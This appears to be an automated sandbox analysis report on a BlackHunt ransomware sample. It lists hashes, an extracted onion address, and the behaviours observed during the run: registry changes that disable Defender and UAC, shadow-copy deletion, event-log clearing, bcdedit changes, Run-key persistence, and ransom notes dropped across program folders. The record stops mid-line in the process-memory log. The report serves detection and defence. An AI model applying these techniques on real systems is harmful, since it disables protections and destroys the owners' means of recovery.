Analysis
-
max time kernel
117s -
max time network
117s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system -
submitted
19-01-2024 01:22
Static task
static1
Behavioral task
behavioral1
Sample
f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe
Resource
win10v2004-20231215-en
General
-
Target
f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe
-
Size
707KB
-
MD5
d5980d070ff74bb810fb95cd21332ae2
-
SHA1
73d0f26f3a2100605765d991456090392e157a63
-
SHA256
f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e
-
SHA512
56eddd4dc0b9a9bc5c8ca5178935a6ea4f6b487f28120c6956e5b1879cb4e91a4fea1db06e32afeadaaa62047f8e0938c99ac0a4ec3260f85c8c90fec67f1f88
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1V8nvnh:6uaTmkZJ+naie5OTamgEoKxLW4vh
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 2480 fsutil.exe 2884 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection conhost.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" conhost.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 2352 wevtutil.exe 1632 wevtutil.exe 2316 wevtutil.exe 1876 wevtutil.exe 2788 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 1808 bcdedit.exe 2944 bcdedit.exe 2304 bcdedit.exe 2480 bcdedit.exe -
Renames multiple (2883) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 1648 wbadmin.exe 2988 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Deletes itself 1 IoCs
pid Process 2736 cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\X: f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened (read-only) \??\B: f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened (read-only) \??\Q: f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened (read-only) \??\O: f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened (read-only) \??\Z: f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened (read-only) \??\G: f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened (read-only) \??\H: f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened (read-only) \??\J: f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened (read-only) \??\K: f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened (read-only) \??\M: f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\W: f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened (read-only) \??\R: f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened (read-only) \??\U: f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened (read-only) \??\A: f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened (read-only) \??\S: f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened (read-only) \??\V: f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened (read-only) \??\L: f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened (read-only) \??\N: f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened (read-only) \??\E: f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened (read-only) \??\Y: f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened (read-only) \??\I: f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\T: f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened (read-only) \??\P: f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened (read-only) \??\M: fsutil.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 2 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Thunder_Bay f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Riyadh89 f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\cs\LC_MESSAGES\vlc.mo f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File created C:\Program Files\VideoLAN\VLC\locale\sl\#BlackHunt_ReadMe.hta f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\acro20.lng f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Vostok f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened for modification C:\Program Files\Java\jre7\bin\server\Xusage.txt f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\zh_TW\LC_MESSAGES\vlc.mo f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\ReadOutLoud.api f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.console.nl_zh_4.4.0.v20140623020002.jar f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4-dark_win.css f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Colombo f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\license.html f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\UTC f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened for modification C:\Program Files\VideoLAN\VLC\COPYING.txt f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File created C:\Program Files\VideoLAN\VLC\locale\pt_BR\#BlackHunt_ReadMe.hta f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File created C:\Program Files\VideoLAN\VLC\locale\ru\#BlackHunt_ReadMe.hta f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File created C:\Program Files\VideoLAN\VLC\locale\tr\LC_MESSAGES\#BlackHunt_ReadMe.hta f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-ui_zh_CN.jar f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File created C:\Program Files\VideoLAN\VLC\plugins\access_output\#BlackHunt_ReadMe.hta f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened for modification C:\Program Files\WriteHide.ocx f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\travel.png f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-modules.xml f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-core_zh_CN.jar f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File created C:\Program Files\VideoLAN\VLC\locale\ks_IN\#BlackHunt_ReadMe.txt f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File created C:\Program Files\VideoLAN\VLC\locale\tl\#BlackHunt_ReadMe.txt f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Monterrey f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\feature.xml f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Antarctica\DumontDUrville f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\rectangle_photo_Thumbnail.bmp f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File created C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\#BlackHunt_Private.key f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\#BlackHunt_ReadMe.txt f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Zurich f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-heapdump_ja.jar f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\HLS.api f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\#BlackHunt_ReadMe.hta f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\Christmas f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.observable.nl_ja_4.4.0.v20140623020002.jar f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-autoupdate-services.jar f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File created C:\Program Files\VideoLAN\VLC\locale\ps\#BlackHunt_ReadMe.hta f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\circle_glass_Thumbnail.bmp f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\menu_style_default_Thumbnail.png f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-sa.jar f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Mexico_City f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File created C:\Program Files\VideoLAN\VLC\locale\sl\#BlackHunt_ReadMe.txt f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File created C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\Desktop\#BlackHunt_Private.key f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\#BlackHunt_ReadMe.txt f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Jamaica f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Sydney f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.mbeanbrowser_5.5.0.165303.jar f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-snaptracer_ja.jar f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened for modification C:\Program Files\Java\jre7\bin\server\classes.jsa f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-io.xml f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-core.xml f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File created C:\Program Files\VideoLAN\VLC\locale\gl\LC_MESSAGES\#BlackHunt_Private.key f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Kamchatka f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Cayman f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File created C:\Program Files\Java\jre7\bin\server\#BlackHunt_ReadMe.hta f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File created C:\Program Files\VideoLAN\VLC\locale\en_GB\LC_MESSAGES\#BlackHunt_ReadMe.txt f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\de\LC_MESSAGES\vlc.mo f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File created C:\Program Files\VideoLAN\VLC\lua\meta\reader\#BlackHunt_Private.key f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\SPPlugins\#BlackHunt_ReadMe.txt f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 804 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 2352 vssadmin.exe 1908 vssadmin.exe 1032 vssadmin.exe 2496 vssadmin.exe 2728 vssadmin.exe 3060 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 1744 taskkill.exe -
Modifies registry class 8 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2920 PING.EXE -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 2740 mshta.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 1924 f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe Token: SeRestorePrivilege 1924 f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe Token: SeBackupPrivilege 1924 f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe Token: SeTakeOwnershipPrivilege 1924 f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe Token: SeAuditPrivilege 1924 f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe Token: SeSecurityPrivilege 1924 f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe Token: SeIncBasePriorityPrivilege 1924 f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe Token: SeBackupPrivilege 1080 vssvc.exe Token: SeRestorePrivilege 1080 vssvc.exe Token: SeAuditPrivilege 1080 vssvc.exe Token: SeBackupPrivilege 2700 wbengine.exe Token: SeRestorePrivilege 2700 wbengine.exe Token: SeSecurityPrivilege 2700 wbengine.exe Token: SeSecurityPrivilege 1632 wevtutil.exe Token: SeBackupPrivilege 1632 wevtutil.exe Token: SeSecurityPrivilege 2352 wevtutil.exe Token: SeBackupPrivilege 2352 wevtutil.exe Token: SeSecurityPrivilege 2316 wevtutil.exe Token: SeBackupPrivilege 2316 wevtutil.exe Token: SeSecurityPrivilege 1876 wevtutil.exe Token: SeBackupPrivilege 1876 wevtutil.exe Token: SeSecurityPrivilege 2788 wevtutil.exe Token: SeBackupPrivilege 2788 wevtutil.exe Token: SeDebugPrivilege 1744 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1924 wrote to memory of 2144 1924 f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe 29 PID 1924 wrote to memory of 2144 1924 f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe 29 PID 1924 wrote to memory of 2144 1924 f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe 29 PID 1924 wrote to memory of 2144 1924 f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe 29 PID 1924 wrote to memory of 2308 1924 f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe 31 PID 1924 wrote to memory of 2308 1924 f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe 31 PID 1924 wrote to memory of 2308 1924 f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe 31 PID 1924 wrote to memory of 2308 1924 f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe 31 PID 1924 wrote to memory of 2136 1924 f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe 34 PID 1924 wrote to memory of 2136 1924 f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe 34 PID 1924 wrote to memory of 2136 1924 f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe 34 PID 1924 wrote to memory of 2136 1924 f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe 34 PID 2144 wrote to memory of 2564 2144 cmd.exe 33 PID 2144 wrote to memory of 2564 2144 cmd.exe 33 PID 2144 wrote to memory of 2564 2144 cmd.exe 33 PID 1924 wrote to memory of 2612 1924 f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe 36 PID 1924 wrote to memory of 2612 1924 f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe 36 PID 1924 wrote to memory of 2612 1924 f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe 36 PID 1924 wrote to memory of 2612 1924 f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe 36 PID 2308 wrote to memory of 2664 2308 cmd.exe 38 PID 2308 wrote to memory of 2664 2308 cmd.exe 38 PID 2308 wrote to memory of 2664 2308 cmd.exe 38 PID 1924 wrote to memory of 2680 1924 f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe 39 PID 1924 wrote to memory of 2680 1924 f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe 39 PID 1924 wrote to memory of 2680 1924 f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe 39 PID 1924 wrote to memory of 2680 1924 f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe 39 PID 1924 wrote to memory of 2704 1924 f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe 40 PID 1924 wrote to memory of 2704 1924 f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe 40 PID 1924 wrote to memory of 2704 1924 f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe 40 PID 1924 wrote to memory of 2704 1924 f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe 40 PID 1924 wrote to memory of 2596 1924 f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe 43 PID 1924 wrote to memory of 2596 1924 f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe 43 PID 1924 wrote to memory of 2596 1924 f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe 43 PID 1924 wrote to memory of 2596 1924 f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe 43 PID 1924 wrote to memory of 2756 1924 f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe 45 PID 1924 wrote to memory of 2756 1924 f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe 45 PID 1924 wrote to memory of 2756 1924 f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe 45 PID 1924 wrote to memory of 2756 1924 f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe 45 PID 2136 wrote to memory of 1640 2136 cmd.exe 46 PID 2136 wrote to memory of 1640 2136 cmd.exe 46 PID 2136 wrote to memory of 1640 2136 cmd.exe 46 PID 1924 wrote to memory of 2688 1924 f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe 47 PID 1924 wrote to memory of 2688 1924 f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe 47 PID 1924 wrote to memory of 2688 1924 f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe 47 PID 1924 wrote to memory of 2688 1924 f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe 47 PID 1924 wrote to memory of 2632 1924 f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe 48 PID 1924 wrote to memory of 2632 1924 f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe 48 PID 1924 wrote to memory of 2632 1924 f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe 48 PID 1924 wrote to memory of 2632 1924 f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe 48 PID 2612 wrote to memory of 2500 2612 cmd.exe 49 PID 2612 wrote to memory of 2500 2612 cmd.exe 49 PID 2612 wrote to memory of 2500 2612 cmd.exe 49 PID 1924 wrote to memory of 2488 1924 f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe 51 PID 1924 wrote to memory of 2488 1924 f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe 51 PID 1924 wrote to memory of 2488 1924 f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe 51 PID 1924 wrote to memory of 2488 1924 f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe 51 PID 1924 wrote to memory of 2712 1924 f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe 52 PID 1924 wrote to memory of 2712 1924 f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe 52 PID 1924 wrote to memory of 2712 1924 